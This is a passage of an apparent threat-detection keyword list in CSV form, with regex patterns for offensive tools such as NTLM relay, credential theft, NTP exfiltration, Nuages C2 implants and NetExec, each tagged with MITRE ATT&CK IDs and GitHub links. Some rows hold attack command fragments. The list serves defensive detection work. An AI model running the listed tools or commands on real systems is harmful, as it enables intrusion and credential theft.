-*",".{0,1000}ntlmrelayx\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ntlmrelayx --*",".{0,1000}ntlmrelayx\s\-\-.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ntlmrelayx.*",".{0,1000}ntlmrelayx\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*ntlmrelayx.py.log*",".{0,1000}ntlmrelayx\.py\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*ntlmscan.py*",".{0,1000}ntlmscan\.py.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","340","56","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*ntlmscan-master.zip*",".{0,1000}ntlmscan\-master\.zip.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","340","56","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*NTLMSleuth.ps1*",".{0,1000}NTLMSleuth\.ps1.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","8","1","7","0","2023-12-12T17:23:35Z","2023-12-12T16:41:35Z" "*NTLMSleuth.sh*",".{0,1000}NTLMSleuth\.sh.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","8","1","7","0","2023-12-12T17:23:35Z","2023-12-12T16:41:35Z" "*NtlmThief.exe*",".{0,1000}NtlmThief\.exe.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*NtlmThief.sln*",".{0,1000}NtlmThief\.sln.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*NtlmThief.vcxproj*",".{0,1000}NtlmThief\.vcxproj.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*NtlmThief-main*",".{0,1000}NtlmThief\-main.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*ntlmv1.py --ntlmv1 *::*",".{0,1000}ntlmv1\.py\s\-\-ntlmv1\s.{0,1000}\:\:.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*ntlmv1.py*",".{0,1000}ntlmv1\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*ntlmv1_check*",".{0,1000}ntlmv1_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*ntlmv1-multi --ntlmv1 *",".{0,1000}ntlmv1\-multi\s\-\-ntlmv1\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*NtoskrnlOffsets.csv*",".{0,1000}NtoskrnlOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*ntpescape*recv*",".{0,1000}ntpescape.{0,1000}recv.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*ntpescape*send*",".{0,1000}ntpescape.{0,1000}send.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*ntpescape-master.*",".{0,1000}ntpescape\-master\..{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","1","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*NtRemoteLoad-main*",".{0,1000}NtRemoteLoad\-main.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*ntrights.exe*",".{0,1000}ntrights\.exe.{0,1000}","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*NtUserMNDragOverExploit*",".{0,1000}NtUserMNDragOverExploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*NtWa1tF0rS1ngle0bj3ct Executed*",".{0,1000}NtWa1tF0rS1ngle0bj3ct\sExecuted.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*Nuages*/Implants*",".{0,1000}Nuages.{0,1000}\/Implants.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages.clearImplants *",".{0,1000}nuages\.clearImplants\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages.getAutoruns*",".{0,1000}nuages\.getAutoruns.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages.getImplants*",".{0,1000}nuages\.getImplants.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages.getListeners*",".{0,1000}nuages\.getListeners.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages.printImplants*",".{0,1000}nuages\.printImplants.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages.printListeners*",".{0,1000}nuages\.printListeners.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages_cli.js*",".{0,1000}nuages_cli\.js.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*NuagesC2Connector*",".{0,1000}NuagesC2Connector.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*NuagesC2Implant*",".{0,1000}NuagesC2Implant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*NuagesPythonImplant*",".{0,1000}NuagesPythonImplant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*NuagesSharpImplant*",".{0,1000}NuagesSharpImplant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt*",".{0,1000}nuclei\s\-t\s\~\/tool\/nuclei\/nuclei\-templates\/cves\/CVE\-2020\-5902\.yaml\s\-l\shttps\.txt.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nuclei -t workflows/bigip-pwner-workflow.yaml*",".{0,1000}nuclei\s\-t\sworkflows\/bigip\-pwner\-workflow\.yaml.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nuclei -u *",".{0,1000}nuclei\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*nuclei-burp-plugin*",".{0,1000}nuclei\-burp\-plugin.{0,1000}","offensive_tool_keyword","Xerror","A BurpSuite plugin intended to help with nuclei template generation.","T1583 T1595 T1190","N/A","N/A","N/A","Network Exploitation tools","https://github.com/projectdiscovery/nuclei-burp-plugin","1","1","N/A","N/A","10","1086","107","2024-04-19T08:02:59Z","2022-01-17T10:31:33Z" "*Nuke_Privileges /Process:*",".{0,1000}Nuke_Privileges\s\/Process\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*NUL0x4C/APCLdr*",".{0,1000}NUL0x4C\/APCLdr.{0,1000}","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","4","300","52","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z" "*NUL0x4C/AtomLdr*",".{0,1000}NUL0x4C\/AtomLdr.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*null-byte.com/bypass-amsi*",".{0,1000}null\-byte\.com\/bypass\-amsi.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*nullinux -rid -range *",".{0,1000}nullinux\s\-rid\s\-range\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*nullinux -shares -U *",".{0,1000}nullinux\s\-shares\s\-U\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*nullinux -users *",".{0,1000}nullinux\s\-users\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*NullSessionScanner.*",".{0,1000}NullSessionScanner\..{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","2126","254","2024-02-23T02:17:37Z","2018-08-31T17:42:48Z" "*nxc ftp *bruteforce*",".{0,1000}nxc\sftp\s.{0,1000}bruteforce.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc http *--port*",".{0,1000}nxc\shttp\s.{0,1000}\-\-port.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc ldap * --admin-count*",".{0,1000}nxc\sldap\s.{0,1000}\s\-\-admin\-count.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc ldap * --trusted-for-delegation*",".{0,1000}nxc\sldap\s.{0,1000}\s\-\-trusted\-for\-delegation.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc mssql *--get-file*",".{0,1000}nxc\smssql\s.{0,1000}\-\-get\-file.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc mssql *--local-auth*",".{0,1000}nxc\smssql\s.{0,1000}\-\-local\-auth.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc smb * -x whoami*",".{0,1000}nxc\ssmb\s.{0,1000}\s\-x\swhoami.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc smb *.csv -u *",".{0,1000}nxc\ssmb\s.{0,1000}\.csv\s\-u\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc smb *.txt -u *",".{0,1000}nxc\ssmb\s.{0,1000}\.txt\s\-u\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc ssh *",".{0,1000}nxc\sssh\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc winrm * -X *",".{0,1000}nxc\swinrm\s.{0,1000}\s\-X\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc*nxcdb.py*",".{0,1000}nxc.{0,1000}nxcdb\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc.netexec:main*",".{0,1000}nxc\.netexec\:main.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc.protocols.smb*",".{0,1000}nxc\.protocols\.smb.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxcdb-zipapp-*",".{0,1000}nxcdb\-zipapp\-.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*NYAN-x-CAT/Lime-Crypter*",".{0,1000}NYAN\-x\-CAT\/Lime\-Crypter.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" "*nysm.skel.h*",".{0,1000}nysm\.skel\.h.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*nysm-master.zip*",".{0,1000}nysm\-master\.zip.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation 